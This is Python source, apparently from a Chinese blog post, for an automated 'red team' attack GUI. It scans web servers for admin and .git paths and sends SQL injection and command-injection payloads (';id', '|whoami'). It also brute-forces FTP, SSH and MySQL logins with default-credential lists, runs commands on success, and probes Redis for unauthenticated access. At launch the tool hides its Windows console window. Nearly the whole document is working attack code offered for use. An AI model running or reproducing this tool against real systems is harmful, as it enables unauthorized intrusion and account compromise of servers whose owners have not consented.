def auto_web_attack(self, target, port):
self.log_attack(f" [Web] 开始Web应用攻击...\n")
base_url = f"http://{target}:{port}" if port != 80 else f"http://{target}"
success = False
try:
paths = ['/admin', '/phpmyadmin', '/wp-admin', '/backup', '/.git']
for path in paths:
if not self.auto_attacking:
break
test_url = base_url + path
try:
if REQUESTS_AVAILABLE:
response = requests.get(test_url, timeout=5, verify=False)
if response.status_code == 200:
self.log_attack(f" [+] 发现敏感路径: {test_url}\n")
self.add_vulnerability(f"Web敏感路径: {test_url}")
else:
req = urllib.request.Request(test_url)
response = urllib.request.urlopen(req, timeout=5)
self.log_attack(f" [+] 发现敏感路径: {test_url}\n")
self.add_vulnerability(f"Web敏感路径: {test_url}")
except:
pass
sql_payloads = ["'", "1' OR '1'='1", "admin' --"]
for payload in sql_payloads:
if not self.auto_attacking:
break
test_url = f"{base_url}/?id={payload}"
try:
if REQUESTS_AVAILABLE:
response = requests.get(test_url, timeout=5, verify=False)
if ERROR_PATTERN.search(response.text.lower()):
self.log_attack(f" [+] 发现SQL注入漏洞: {test_url}\n")
self.add_vulnerability(f"SQL注入: {test_url}")
success = True
else:
req = urllib.request.Request(test_url)
response = urllib.request.urlopen(req, timeout=5)
content = response.read().decode('utf-8', errors='ignore')
if ERROR_PATTERN.search(content.lower()):
self.log_attack(f" [+] 发现SQL注入漏洞: {test_url}\n")
self.add_vulnerability(f"SQL注入: {test_url}")
success = True
except:
pass
cmd_payloads = [";id", "|whoami", "`whoami`"]
for payload in cmd_payloads:
if not self.auto_attacking:
break
test_url = f"{base_url}/?cmd={payload}"
try:
if REQUESTS_AVAILABLE:
response = requests.get(test_url, timeout=5, verify=False)
if UID_PATTERN.search(response.text) or WINDOWS_PATTERN.search(response.text.lower()):
self.log_attack(f" [+] 发现命令注入漏洞: {test_url}\n")
self.add_vulnerability(f"命令注入: {test_url}")
success = True
else:
req = urllib.request.Request(test_url)
response = urllib.request.urlopen(req, timeout=5)
content = response.read().decode('utf-8', errors='ignore')
if UID_PATTERN.search(content) or WINDOWS_PATTERN.search(content.lower()):
self.log_attack(f" [+] 发现命令注入漏洞: {test_url}\n")
self.add_vulnerability(f"命令注入: {test_url}")
success = True
except:
pass
except Exception as e:
self.log_attack(f" [-] Web攻击错误: {str(e)}\n")
return success
def auto_ftp_attack(self, target):
self.log_attack(f" [FTP] 开始FTP服务攻击...\n")
success = False
try:
if FTP_AVAILABLE:
try:
ftp = ftplib.FTP(target, timeout=5)
ftp.login()
self.log_attack(f" [+] FTP匿名登录成功!\n")
self.add_vulnerability(f"FTP匿名访问: {target}")
files = ftp.nlst()
self.log_attack(f" [+] 可访问文件: {files[:5]}...\n")
success = True
ftp.quit()
except:
common_creds = [
('admin', 'admin'), ('ftp', 'ftp'),
('user', 'user'), ('test', 'test'),
('root', 'root'), ('anonymous', 'anonymous')
]
for username, password in common_creds:
if not self.auto_attacking:
break
try:
ftp = ftplib.FTP(target, timeout=5)
ftp.login(username, password)
self.log_attack(f" [+] FTP弱口令登录成功: {username}:{password}\n")
self.add_vulnerability(f"FTP弱口令: {username}:{password}")
success = True
ftp.quit()
break
except:
continue
else:
self.log_attack(" [-] FTP库不可用,跳过FTP攻击\n")
except Exception as e:
self.log_attack(f" [-] FTP攻击错误: {str(e)}\n")
return success
def auto_ssh_attack(self, target):
self.log_attack(f" [SSH] 开始SSH服务攻击...\n")
success = False
try:
if PARAMIKO_AVAILABLE:
common_creds = [
('root', 'root'), ('admin', 'admin'),
('test', 'test'), ('user', 'user'),
('ubuntu', 'ubuntu'), ('centos', 'centos')
]
for username, password in common_creds:
if not self.auto_attacking:
break
try:
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(target, username=username, password=password, timeout=5)
self.log_attack(f" [+] SSH弱口令登录成功: {username}:{password}\n")
self.add_vulnerability(f"SSH弱口令: {username}:{password}")
stdin, stdout, stderr = ssh.exec_command('whoami')
output = stdout.read().decode().strip()
self.log_attack(f" [+] 当前用户: {output}\n")
success = True
ssh.close()
break
except:
continue
else:
self.log_attack(" [-] Paramiko库不可用,跳过SSH攻击\n")
except Exception as e:
self.log_attack(f" [-] SSH攻击错误: {str(e)}\n")
return success
def auto_redis_attack(self, target):
self.log_attack(f" [Redis] 开始Redis服务攻击...\n")
success = False
try:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
sock.connect((target, 6379))
sock.send(b"INFO\n")
response = sock.recv(1024).decode('utf-8', errors='ignore')
if VERSION_PATTERN.search(response):
self.log_attack(f" [+] Redis未授权访问成功!\n")
self.add_vulnerability(f"Redis未授权访问: {target}")
sock.send(b"CONFIG GET dir\n")
response = sock.recv(1024).decode('utf-8', errors='ignore')
self.log_attack(f" [+] Redis配置信息: {response}\n")
success = True
sock.close()
except:
pass
except Exception as e:
self.log_attack(f" [-] Redis攻击错误: {str(e)}\n")
return success
def auto_mysql_attack(self, target):
self.log_attack(f" [MySQL] 开始MySQL服务攻击...\n")
success = False
try:
if MYSQL_AVAILABLE:
common_creds = [
('root', 'root'), ('admin', 'admin'),
('test', 'test'), ('mysql', 'mysql'),
('root', ''), ('root', 'password')
]
for username, password in common_creds:
if not self.auto_attacking:
break
try:
conn = mysql.connector.connect(
host=target,
user=username,
password=password,
connection_timeout=5
)
self.log_attack(f" [+] MySQL弱口令登录成功: {username}:{password}\n")
self.add_vulnerability(f"MySQL弱口令: {username}:{password}")
cursor = conn.cursor()
cursor.execute("SELECT version()")
version = cursor.fetchone()
self.log_attack(f" [+] MySQL版本: {version}\n")
success = True
conn.close()
break
except:
continue
else:
self.log_attack(" [-] MySQL库不可用,跳过MySQL攻击\n")
except Exception as e:
self.log_attack(f" [-] MySQL攻击错误: {str(e)}\n")
return success
def main():
if os.name == 'nt':
try:
import ctypes
ctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 0)
except:
pass
root = tk.Tk()
app = ModernRedTeamGUI(root)
root.mainloop()
if __name__ == "__main__":
main()
扫一扫
1748
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
